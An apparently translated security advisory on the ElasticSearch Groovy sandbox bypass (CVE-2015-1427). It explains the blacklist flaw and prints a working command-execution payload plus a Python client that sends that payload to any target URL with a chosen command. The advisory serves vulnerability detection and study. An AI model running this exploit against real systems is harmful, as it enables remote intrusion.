Knownsec security research group, 2015.03.05
ElasticSearch is a search and analytics engine written in Java. In 2014 a remote code execution vulnerability, CVE-2014-3120, was disclosed in its script query module: because the engine lets queries manipulate data through script expressions, and the expression language at the time was MVEL, an attacker could craft an MVEL expression that executes arbitrary Java code. The scripting engine was later switched to Groovy and placed under a sandbox that is supposed to intercept dangerous code, but the sandbox's restrictions are not strict, and the result is once again remote code execution (this Groovy sandbox bypass was assigned CVE-2015-1427).
Affected versions:
1.4: 1.4.2, 1.4.1, 1.4.0, 1.4.0.Beta1
1.3: 1.3.7, 1.3.6, 1.3.5, 1.3.4, 1.3.3, 1.3.2, 1.3.1, 1.3.0
The sandbox that the exploit has to get past is implemented by the class org.elasticsearch.script.groovy.GroovySandboxExpressionChecker. It customizes the Groovy compiler so that every expression is security-checked before it runs, but this is not the kind of sandbox the Java SecurityManager provides. As the code shows, it judges whether an expression is legal from the expression's own semantics (the names it constructs and calls) against a blacklist; it can fairly be called a "shallow" sandbox.
The specific code flow is shown in the following figure:
The whitelist of calls that are allowed is as follows:
From the whitelist above it can be seen that the classes whose objects may be constructed and whose methods may be called are ordinary classes, none of which we can abuse directly. To reach the classes we actually want through reflection we need a Class object, but the blacklist restricts calls to getClass, so we cannot obtain one that way. The methods of Class itself, however, are in the whitelist, and forName is not restricted: if we can obtain any Class object by another route, calling forName on it gives us the class we want.
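To make the "shallow sandbox" point concrete, here is a simplified model of a name-based expression blacklist, written for this note as an added example. It is not the code of GroovySandboxExpressionChecker and does not reproduce its real lists; it only reproduces the shape of the mistake the text describes: the check looks at which method names an expression calls, so an expression that reaches a Class object without calling getClass (a `.class` literal) is never flagged, and forName is then free to load anything. The blacklist entries and the two expressions are assumptions chosen for illustration.

```python
import re

# Assumed, simplified blacklist of method names (not ElasticSearch's real list).
METHOD_BLACKLIST = {"getClass", "wait", "notify", "notifyAll", "invokeMethod", "finalize"}

# A method call, as a name-based checker sees it: ".name(" somewhere in the expression.
CALL_RE = re.compile(r"\.\s*([A-Za-z_]\w*)\s*\(")


def called_methods(expr):
    """Method names the expression calls, in source order."""
    return CALL_RE.findall(expr)


def shallow_check(expr, blacklist=METHOD_BLACKLIST):
    """What a name-based sandbox decides: the blacklisted names it finds.
    An empty list means the expression is allowed to run."""
    return [m for m in called_methods(expr) if m in blacklist]


def class_object_reachable(expr):
    """The property the sandbox should have been checking instead: can the
    expression get hold of a java.lang.Class at all?  Both a getClass() call
    and a `.class` literal hand one out, and Class.forName does the rest."""
    return bool(re.search(r"\.getClass\s*\(|\.class\b", expr))


# Constructed expressions: the obvious route the blacklist catches, and the
# route from the writeup (Math.class) that it does not.
BLOCKED = '"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")'
BYPASS = 'p=Math.class.forName("java.lang.Runtime").getRuntime().exec("whoami").getText()'

if __name__ == "__main__":
    for expr in (BLOCKED, BYPASS):
        hits = shallow_check(expr)
        print("blocked" if hits else "allowed", hits, "| reaches Class:",
              class_object_reachable(expr), "|", expr)
```

Run it and the first expression is rejected on `getClass` while the second is allowed, even though `class_object_reachable` is true for both: the sandbox is judging names, not capabilities, which is why adding `forName` to the same name blacklist would only move the problem rather than fix it.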
The following script can be used to test an ElasticSearch system for the vulnerability. It goes into the body of a search request (as a script field) sent from Bash; Math.class yields a Class object without ever calling getClass, forName loads java.lang.Runtime from it, and getText() is Groovy's extension on Process that returns the command's standard output. The index must contain at least one document, since script fields are evaluated per hit:
"script": "p=Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()"
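The detection request above, wrapped into a small Python client as an added example (this is not the advisory's own tool). It assumes the target is reachable at a base URL you pass on the command line (default http://127.0.0.1:9200), that the cluster holds at least one document so the script field is evaluated, and that the response has the ElasticSearch 1.x search shape, where script field values appear under each hit's `fields`. The field name `detect` and the helper names are this example's own.

```python
import json
import sys
import urllib.error
import urllib.request

SCRIPT_TEMPLATE = (
    'p=Math.class.forName("java.lang.Runtime")'
    '.getRuntime().exec("{cmd}").getText()'
)


def build_payload(command="whoami", field="detect"):
    """Search body carrying the writeup's Groovy script as a script field.
    size=1 keeps the script to a single evaluation (it runs once per hit)."""
    return {
        "size": 1,
        "query": {"match_all": {}},
        "script_fields": {
            field: {"lang": "groovy", "script": SCRIPT_TEMPLATE.format(cmd=command)}
        },
    }


def extract_output(response, field="detect"):
    """Pull the script result out of an ES 1.x search response.
    Returns None when the field is absent: the sandbox rejected the script,
    dynamic scripting is disabled, the index is empty, or an error came back."""
    for hit in response.get("hits", {}).get("hits", []):
        values = hit.get("fields", {}).get(field)
        if values:
            return "".join(str(v) for v in values)
    return None


def is_vulnerable(response, field="detect"):
    """Vulnerable only if the command actually produced output."""
    out = extract_output(response, field)
    return out is not None and out.strip() != ""


def check(base_url, command="whoami", timeout=10):
    """POST the payload to /_search and classify the answer (needs network)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/_search",
        data=json.dumps(build_payload(command)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = json.load(resp)
    except urllib.error.HTTPError as e:
        # ES 1.x answers a rejected script with a JSON error and a non-2xx status.
        body = json.loads(e.read().decode() or "{}")
    return is_vulnerable(body), extract_output(body)


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:9200"
    vulnerable, output = check(url)
    print("vulnerable" if vulnerable else "not vulnerable", "-", repr(output))
```

A patched or hardened instance (dynamic scripting disabled via `script.disable_dynamic: true` in elasticsearch.yml, or a version without the Groovy sandbox) returns an error or a hit without the script field, which the classifier reports as not vulnerable; only real command output counts as a positive.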